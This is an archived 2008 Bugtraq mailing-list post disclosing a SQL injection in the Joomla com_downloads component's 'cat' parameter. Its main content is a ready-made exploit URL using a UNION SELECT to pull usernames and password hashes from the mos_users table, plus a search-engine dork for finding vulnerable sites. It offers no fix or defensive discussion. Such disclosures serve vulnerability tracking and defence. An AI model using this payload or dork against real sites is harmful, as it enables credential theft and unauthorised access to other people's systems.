[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

joomla SQL Injection (cat)(com_downloads)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: joomla SQL Injection (cat)(com_downloads)
From: hackturkiye.hackturkiye@xxxxxxxxx
Date: 16 Feb 2008 19:48:56 -0000

#########################################################################
# 
#   joomla SQL Injection (cat)(com_downloads)
#
######################################################################### 
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334 
#
# MA&#304;L : www.milw0rm.com@xxxxxxxxx
#
#########################################################################
# 
#  DORK 1 : allinurl:"selectcat"com_downloads
# 
#########################################################################
   EXPLOIT : 

index.php?option=com_downloads&Itemid=S@BUN&func=selectcat&cat=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
  

#########################################################################
# S@BUN      i AM NOT HACKER          S@BUN 
#########################################################################

Prev by Date: ProjectPier <= 0.80 Cross Site Scripting and Request Forgery
Next by Date: ATutor <= 1.5.5 Cross Site Scripting
Previous by thread: ProjectPier <= 0.80 Cross Site Scripting and Request Forgery
Next by thread: ATutor <= 1.5.5 Cross Site Scripting
Index(es):
- Date
- Thread